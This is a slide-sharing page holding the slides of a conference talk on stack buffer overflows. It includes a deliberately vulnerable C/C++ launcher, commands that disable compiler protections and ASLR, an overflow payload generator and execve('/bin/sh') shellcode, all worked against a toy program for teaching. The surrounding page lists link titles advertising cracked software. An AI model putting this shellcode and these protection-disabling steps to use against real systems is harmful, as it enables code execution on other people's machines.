104 LINUX SYSTEM CALL TABLE FOR X86 64 http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ Hex to decimal converter https://www.rapidtables.com/convert/number/hex-to-decimal.html https://www.asciitohex.com Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar Flake https://vimeo.com/252868605 Resources @pati_gallardo

More Related Content

PDF
The Anatomy of an Exploit (CPPP 2019)
Patricia Aas
 
PDF
The Anatomy of an Exploit
Patricia Aas
 
PDF
Software Vulnerabilities in C and C++ (CppCon 2018)
Patricia Aas
 
PDF
Thoughts On Learning A New Programming Language
Patricia Aas
 
PDF
The Anatomy of an Exploit (NDC TechTown 2019))
Patricia Aas
 
PDF
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
 
PDF
C++ The Principles of Most Surprise
Patricia Aas
 
PDF
Secure Programming Practices in C++ (NDC Security 2018)
Patricia Aas
 
The Anatomy of an Exploit (CPPP 2019)
Patricia Aas
 
The Anatomy of an Exploit
Patricia Aas
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Patricia Aas
 
Thoughts On Learning A New Programming Language
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
Patricia Aas
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
 
C++ The Principles of Most Surprise
Patricia Aas
 
Secure Programming Practices in C++ (NDC Security 2018)
Patricia Aas
 

What's hot (20)

PDF
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
PDF
Trying to learn C# (NDC Oslo 2019)
Patricia Aas
 
PDF
Reading Other Peoples Code (Web Rebels 2018)
Patricia Aas
 
PDF
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
PDF
Isolating GPU Access in its Own Process
Patricia Aas
 
PPTX
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
PDF
Chromium Sandbox on Linux (BlackHoodie 2018)
Patricia Aas
 
PDF
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
PDF
Introduction to Memory Exploitation (CppEurope 2021)
Patricia Aas
 
PPTX
Cisco IOS shellcode: All-in-one
DefconRussia
 
PDF
Publishing a Perl6 Module
ast_j
 
PDF
DEF CON 23 - COLIN O'FLYNN - dont whisper my chips
Felipe Prado
 
PDF
Linux Security APIs and the Chromium Sandbox
Patricia Aas
 
PDF
TDOH x 台科 pwn課程
Weber Tsai
 
PDF
Better detection of what modules are used by some Perl 5 code
charsbar
 
DOCX
Php5 certification mock exams
echo liu
 
PDF
C++ for Java Developers (JavaZone 2017)
Patricia Aas
 
PPTX
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
PPTX
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
PPTX
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
Trying to learn C# (NDC Oslo 2019)
Patricia Aas
 
Reading Other Peoples Code (Web Rebels 2018)
Patricia Aas
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
Isolating GPU Access in its Own Process
Patricia Aas
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Patricia Aas
 
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
Introduction to Memory Exploitation (CppEurope 2021)
Patricia Aas
 
Cisco IOS shellcode: All-in-one
DefconRussia
 
Publishing a Perl6 Module
ast_j
 
DEF CON 23 - COLIN O'FLYNN - dont whisper my chips
Felipe Prado
 
Linux Security APIs and the Chromium Sandbox
Patricia Aas
 
TDOH x 台科 pwn課程
Weber Tsai
 
Better detection of what modules are used by some Perl 5 code
charsbar
 
Php5 certification mock exams
echo liu
 
C++ for Java Developers (JavaZone 2017)
Patricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Ad

Similar to The Anatomy of an Exploit (NDC TechTown 2019) (20)

PDF
Insecure coding in C (and C++)
Olve Maudal
 
PDF
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
PDF
Buffer overflow tutorial
hughpearse
 
PDF
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
PDF
CNIT 127 14: Protection Mechanisms
Sam Bowne
 
PDF
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
Austin c-c++-meetup-feb2018-spectre
Kim Phillips
 
PPTX
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
PDF
Software Security
Roman Oliynykov
 
PPT
Software security
Roman Oliynykov
 
PDF
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
PDF
CNIT 127 14: Protection Mechanisms
Sam Bowne
 
PPTX
Linux binary analysis and exploitation
Dharmalingam Ganesan
 
PPTX
Software to the slaughter
Quinn Wilton
 
PDF
Wrangling with the Ghost: An Inside Story of Mitigating Speculative Execution...
Priyanka Aash
 
PPTX
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
PDF
Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit
Carlos Eduardo
 
PPTX
The Silence of the Canaries
Kernel TLV
 
PDF
Eusecwest
zynamics GmbH
 
PDF
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
Insecure coding in C (and C++)
Olve Maudal
 
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
Buffer overflow tutorial
hughpearse
 
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
CNIT 127 14: Protection Mechanisms
Sam Bowne
 
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Austin c-c++-meetup-feb2018-spectre
Kim Phillips
 
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
Software Security
Roman Oliynykov
 
Software security
Roman Oliynykov
 
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
CNIT 127 14: Protection Mechanisms
Sam Bowne
 
Linux binary analysis and exploitation
Dharmalingam Ganesan
 
Software to the slaughter
Quinn Wilton
 
Wrangling with the Ghost: An Inside Story of Mitigating Speculative Execution...
Priyanka Aash
 
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit
Carlos Eduardo
 
The Silence of the Canaries
Kernel TLV
 
Eusecwest
zynamics GmbH
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
Ad

More from Patricia Aas (20)

PDF
The fundamental misunderstanding in Team Topologies
Patricia Aas
 
PDF
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
PDF
Telling a story
Patricia Aas
 
PDF
Return Oriented Programming, an introduction
Patricia Aas
 
PDF
I can't work like this (KDE Academy Keynote 2021)
Patricia Aas
 
PDF
Dependency Management in C++ (NDC TechTown 2021)
Patricia Aas
 
PDF
Introduction to Memory Exploitation (Meeting C++ 2021)
Patricia Aas
 
PDF
Classic Vulnerabilities (MUCplusplus2022).pdf
Patricia Aas
 
PDF
Classic Vulnerabilities (ACCU Keynote 2022)
Patricia Aas
 
PDF
Trying to build an Open Source browser in 2020
Patricia Aas
 
PDF
Trying to build an Open Source browser in 2020
Patricia Aas
 
PDF
DevSecOps for Developers, How To Start (ETC 2020)
Patricia Aas
 
PDF
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Patricia Aas
 
PDF
Elections, Trust and Critical Infrastructure (NDC TechTown)
Patricia Aas
 
PDF
Survival Tips for Women in Tech (JavaZone 2019)
Patricia Aas
 
PDF
Embedded Ethics (EuroBSDcon 2019)
Patricia Aas
 
PDF
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Patricia Aas
 
PDF
Make it Fixable (NDC Copenhagen 2018)
Patricia Aas
 
PDF
Why Is Election Security So Hard? (Paranoia 2019)
Patricia Aas
 
PDF
Reading Other Peoples Code (NDC Copenhagen 2019)
Patricia Aas
 
The fundamental misunderstanding in Team Topologies
Patricia Aas
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
Telling a story
Patricia Aas
 
Return Oriented Programming, an introduction
Patricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
Patricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
Patricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Patricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Patricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Patricia Aas
 
Trying to build an Open Source browser in 2020
Patricia Aas
 
Trying to build an Open Source browser in 2020
Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Patricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Patricia Aas
 
Make it Fixable (NDC Copenhagen 2018)
Patricia Aas
 
Why Is Election Security So Hard? (Paranoia 2019)
Patricia Aas
 
Reading Other Peoples Code (NDC Copenhagen 2019)
Patricia Aas
 

Recently uploaded (20)

PDF
IT Consulting Services to Secure Future Growth
Shiv Technolabs Pvt. Ltd.
 
PPTX
WJQSJXNAZJVCVSAXJHBZKSJXKJKXJSBHJBJEHHJB
soniatharv2010
 
PDF
Internet Download Manager IDM Crack powerful download accelerator New Version...
imang66g
 
PDF
Engineering Document Management System (EDMS)
smartprojectwrench
 
PPTX
DevOpsDays Halifax 2025 - Building 10x Organizations Using Modern Productivit...
Justin Reock
 
PDF
Building an Inclusive Web Accessibility Made Simple with Accessibility Analyzer
Accessibility Analyzer
 
PDF
infoteam HELLAS company profile 2025 presentation
alexispapadimitriou
 
PDF
SOFTWARE ENGINEERING Software Engineering (3rd Edition) by K.K. Aggarwal & Yo...
yaderyeka
 
PPTX
ROI from Efficient Content & Campaign Management in the Digital Media Industry
SatishKumar2651
 
PDF
MAGIX Sound Forge Pro CrackSerial Key Keygen
captanhook047
 
PPTX
Odoo ERP for Injection Molding Industry – Optimize Production & Reduce Scrap
SatishKumar2651
 
PDF
Top 10 Project Management Software for Small Teams in 2025.pdf
Tech Qafila
 
PPTX
Bandicam Screen Recorder 8.2.1 Build 2529 Crack
goldheera888
 
PDF
IDM Crack 6.42 Build 42 Patch Serial Key 2025 Free New Version
abidkhan77g77
 
PPTX
Human-Computer Interaction for Lecture 2
ssuserca7fe9
 
PDF
Cloud Native Aachen Meetup - Aug 21, 2025
roehlclemens
 
PDF
Workplace Software and Skills - OpenStax
tranviettoan19672001
 
PDF
Website Design & Development_ Professional Web Design Services.pdf
narayanaduggempudi88
 
PPTX
ERP Manufacturing Modules & Consulting Solutions : Contetra Pvt Ltd
jayjani123
 
PPTX
ROI Analysis for Newspaper Industry with Odoo ERP
SatishKumar2651
 
IT Consulting Services to Secure Future Growth
Shiv Technolabs Pvt. Ltd.
 
WJQSJXNAZJVCVSAXJHBZKSJXKJKXJSBHJBJEHHJB
soniatharv2010
 
Internet Download Manager IDM Crack powerful download accelerator New Version...
imang66g
 
Engineering Document Management System (EDMS)
smartprojectwrench
 
DevOpsDays Halifax 2025 - Building 10x Organizations Using Modern Productivit...
Justin Reock
 
Building an Inclusive Web Accessibility Made Simple with Accessibility Analyzer
Accessibility Analyzer
 
infoteam HELLAS company profile 2025 presentation
alexispapadimitriou
 
SOFTWARE ENGINEERING Software Engineering (3rd Edition) by K.K. Aggarwal & Yo...
yaderyeka
 
ROI from Efficient Content & Campaign Management in the Digital Media Industry
SatishKumar2651
 
MAGIX Sound Forge Pro CrackSerial Key Keygen
captanhook047
 
Odoo ERP for Injection Molding Industry – Optimize Production & Reduce Scrap
SatishKumar2651
 
Top 10 Project Management Software for Small Teams in 2025.pdf
Tech Qafila
 
Bandicam Screen Recorder 8.2.1 Build 2529 Crack
goldheera888
 
IDM Crack 6.42 Build 42 Patch Serial Key 2025 Free New Version
abidkhan77g77
 
Human-Computer Interaction for Lecture 2
ssuserca7fe9
 
Cloud Native Aachen Meetup - Aug 21, 2025
roehlclemens
 
Workplace Software and Skills - OpenStax
tranviettoan19672001
 
Website Design & Development_ Professional Web Design Services.pdf
narayanaduggempudi88
 
ERP Manufacturing Modules & Consulting Solutions : Contetra Pvt Ltd
jayjani123
 
ROI Analysis for Newspaper Industry with Odoo ERP
SatishKumar2651
 

The Anatomy of an Exploit (NDC TechTown 2019)

  • 2. The Anatomy of an Exploit NDC TechTown 2019 Patricia Aas Turtle Sec @pati_gallardo
  • 3. Patricia Aas - Trainer & Consultant Turtle Sec C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/her @pati_gallardo
  • 5. The Target The Exploit @pati_gallardo @halvarflake5 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
  • 6. The Data is the Program and the Program is the Data Memory Loaders Heap Linkers Stack Memory Allocator @pati_gallardo 6
  • 7. Exploit Development is Programming the Weird Machine 7 @pati_gallardo
  • 10. 10 launch.c @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); gets(response); if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } @olvemaudal
  • 11. 11 $ hello$ clang -o launch launch.c launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration] gets(response); ^ 1 warning generated. /tmp/launch-0d1b0f.o: In function `authenticate_and_launch': launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used. CWE-242: Use of Inherently Dangerous Function @pati_gallardo
  • 12. 12 $ hello CMakeLists.txt # Wargames C # ------------------------- add_executable(launch src/launch.c) # Get gets set_property(TARGET launch PROPERTY C_STANDARD 99) # Allow gets target_compile_options(launch PRIVATE -Wno-deprecated-declarations) CMake: Getting gets @pati_gallardo
  • 13. 13 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
  • 14. 14 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar *** buffer overflow detected ***: ./launch terminated Aborted (core dumped) Unhappy Day Scenario @pati_gallardo Unstable Weird State
  • 16. 16 $ hello CMakeLists.txt # Remove Fortify protection in libc # *** buffer overflow detected ***: ./launch terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -D_FORTIFY_SOURCE=0) CMake : Remove fortify protection from libc @pati_gallardo
  • 17. 17 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied *** stack smashing detected ***: <unknown> terminated Aborted (core dumped) CMake : Remove fortify protection from libc @pati_gallardo
  • 19. Stack Canary 100 Return address 99 Stack Canary 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 19 @pati_gallardo
  • 20. 20 $ hello CMakeLists.txt # remove the stack protector # *** stack smashing detected ***: <unknown> terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -fno-stack-protector) CMake: Turn off stack protector @pati_gallardo
  • 21. 21 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Segmentation fault (core dumped) CMake: Turn off stack protector What’s going on? Let’s check on godbolt @pati_gallardo
  • 22. Debug: Local variables on the stack Release: Local variables optimized out @pati_gallardo
  • 23. Let’s try the Debug build then! @pati_gallardo
  • 24. 24 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1869443685 missiles Access denied Operation complete Debug Build Somebody’s bools are acting weird :D ✔ @pati_gallardo
  • 25. Prefer C++ to C, right? @pati_gallardo
  • 26. 26 $ hello CMakeLists.txt # Wargames C++ # ------------------------- add_executable(launch_cpp src/launch.cpp) Start from scratch with C++ @pati_gallardo
  • 27. 27 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main() { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Much better, right?
  • 28. 28 $ hello$ clang++ -o launch_cpp launch.cpp $ Not even a warning! @pati_gallardo Must be better, right?
  • 29. 29 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
  • 30. 30 $ hello$ clang++ -O3 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Operation complete Segmentation fault (core dumped) Let’s test the release build @pati_gallardo
  • 31. 31 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1852796274 missiles Segmentation fault (core dumped) Ok, debug then... Both n_missiles and allowaccess overwritten ✔ @pati_gallardo Ops...
  • 33. int n_missiles = 2; bool allowaccess = false; @pati_gallardo 33
  • 34. 34 launch.cpp @pati_gallardovoid authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); }
  • 35. 35 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access granted Launching 42 missiles Operation complete $ Lets try a shorter string n_missiles -> 42 -> 0x2a -> ‘*’ ✔ @pati_gallardo
  • 36. 36 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBCd Access granted Launching 100 missiles Operation complete Lets try a shorter string n_missiles -> 100 -> 0x64 -> ‘d’ ✔ @pati_gallardo
  • 37. 37 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB0d Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB1d Access granted Launching 100 missiles Operation complete Controlling allowaccess Controlling allowaccess ✔ @pati_gallardo
  • 39. @pati_gallardo 39 $ hello simple_exploit.c int main(void) { struct { uint8_t buffer[8]; bool allowaccess; char n_missiles; } sf; memset(&sf, 0, sizeof sf); sf.allowaccess = true; sf.n_missiles = 42; fwrite(&sf, sizeof sf, 1, stdout); } Automate the string @pati_gallardo @olvemaudal
  • 40. 40 $ hello$ clang -o simple_exploit simple_exploit.c $ ./simple_exploit | ./launch WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete $ ./simple_exploit | ./launch_cpp WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete Let’s try it out! ✔ ✔ @pati_gallardo
  • 41. Fixing the C++ code! @pati_gallardo
  • 42. 42 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); size_t max = sizeof response; std::cin >> std::setw(max) >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Set the width on cin
  • 43. 43 $ hello$ clang++ -o launch_fixed launch_fixed.cpp $ ./launch_fixed WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access denied Operation complete $ ./simple_exploit | ./launch_fixed WarGames MissileLauncher v0.1 Secret: Access denied Operation complete Let’s test it! @pati_gallardo
  • 44. Use sed to binary patch @pati_gallardo
  • 45. 45 $ hello $ objdump -M intel -d ./launch | grep -A 7 "<_Z23authenticate_and_launchv>:" 0000000000400890 <_Z23authenticate_and_launchv>: 400890: 55 push rbp 400891: 48 89 e5 mov rbp,rsp 400894: 48 83 ec 30 sub rsp,0x30 400898: 48 bf 4b 0a 40 00 00 movabs rdi,0x400a4b 40089f: 00 00 00 4008a2: c7 45 fc 02 00 00 00 mov DWORD PTR [rbp-0x4],0x2 4008a9: c6 45 fb 00 mov BYTE PTR [rbp-0x5],0x0 Use sed to binary patch $ cp launch launch_mod $ sed -i "s/xc7x45xfcx02/xc7x45xfcx2a/" ./launch_mod $ sed -i "s/xc6x45xfbx00/xc6x45xfbx01/" ./launch_mod @pati_gallardo n_missiles = 2 allowaccess = false n_missiles = 42 and allowaccess = true
  • 46. 46 $ hello $ ./launch_mod WarGames MissileLauncher v0.1 Secret: David Access granted Launching 42 missiles Operation complete Use sed to binary patch ✔$ ./launch_mod WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 42 missiles Operation complete $ ./launch_mod WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 42 missiles Operation complete ✔ ✔ @pati_gallardo
  • 48. Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode 48 @pati_gallardo
  • 49. Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49 @pati_gallardo
  • 50. Stack grows toward lower addresses Writes go toward higher addresses ptr++ 50 Write direction vs Stack growing direction @pati_gallardo 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Write Payload
  • 51. 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Stack grows toward lower addresses Instructions also go toward higher addresses 51 Write direction vs Stack growing direction @pati_gallardo
  • 52. 52 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } Basic structure of the exploit code
  • 53. 53 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } What we need to know Offset of return address from buffer on the stack Address of buffer in memory
  • 54. 54 launch_bigger.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[110]; printf("%pn", &response); printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Lets make some changes to make it easier Bigger buffer and get the address
  • 55. ASLR echo 0 > /proc/sys/kernel/randomize_va_space @pati_gallardo 55
  • 56. Metasploit pattern_create and pattern_offset Used to find the offset of the return pointer from the start of the buffer Metasploit pattern_create Creates a string of un-repeated character sequences Metasploit pattern_offset Gives the offset in the character sequence of this section @pati_gallardo 56
  • 57. 57 @pati_gallardo$ pattern_create -l 150 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 $ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp $ gdb -q ./launch_bigger (gdb) br *authenticate_and_launch+205 Breakpoint 1 at 0x4008dd (gdb) r Starting program: ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 Access granted Launching 1698771301 missiles Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() () (gdb) x/1xg $sp 0x7fffffffdd18: 0x3765413665413565 (gdb) q $ pattern_offset -q 3765413665413565 [*] Exact match at offset 136 Find the offset of the return address Offset of return address from buffer on the stack Address of buffer in memory
  • 59. 59 simple_stack_overflow_test.c @pati_gallardo#include <stdio.h> #include <string.h> char shellcode[] = "xebx17" // jmp <push_str> "x5f" // <pop_str>: pop %rdi "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x48x89xe6" // mov %rsp,%rsi "x48x89x54x24x08" // mov %rdx,0x8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // <push_str>: callq <pop_str> "/bin/sh"; int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } See talk at CppCon 2018 for details
  • 60. 60 $ hellowargames$ clang -z execstack -o simple_stack_overflow_test simple_stack_overflow_test.c wargames$ ./simple_stack_overflow_test len:37 bytes $ Let’s just test it @pati_gallardo ✔
  • 61. 61 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied Let’s try it @pati_gallardo It just hangs: /bin/sh string not null terminated
  • 63. 63 $ hello simple_stack_overflow_test2.c char shellcode[] = "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2fx2fx73x68" // movabs $0x68732f2f6e69622f,%rbx "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } @pati_gallardo Null terminate the string in the shellcode Hex value Ascii Reverse Ascii 68732f2f6e69622f hs//nib/ /bin//sh
  • 64. 64 $ hellowargames$ clang -z execstack -fno-stack-protector -o simple_stack_overflow_test2 simple_stack_overflow_test2.c wargames$ ./simple_stack_overflow_test2 len:30 bytes $ Let’s just test it @pati_gallardo ✔
  • 65. 65 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 21397 is executing new program: /bin/dash [Inferior 1 (process 21397) exited normally] (gdb) Let’s try it @pati_gallardo Starts /bin/bash but exits immediately ✔
  • 66. 66 $ hellowargames$ clang -o simple_stack_overflow_exploit2 simple_stack_overflow_exploit2.c wargames$ ./simple_stack_overflow_exploit2 > file wargames$ strace -o strace.log ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied wargames$ grep ENOTTY strace.log ioctl(0, TCGETS, 0x7fffffffeba0) = -1 ENOTTY (Inappropriate ioctl for device) What’s wrong? Lets look at strace @pati_gallardo The shell fails to start because of TTY? Google!
  • 68. New Idea! Try to close STDIN and reopen tty first @pati_gallardo 68
  • 69. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 69 @pati_gallardo
  • 70. 70 $ hello shellcode.c #include <unistd.h> #include <fcntl.h> int main(void) { close(0); open("/dev/tty", O_RDWR); char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo
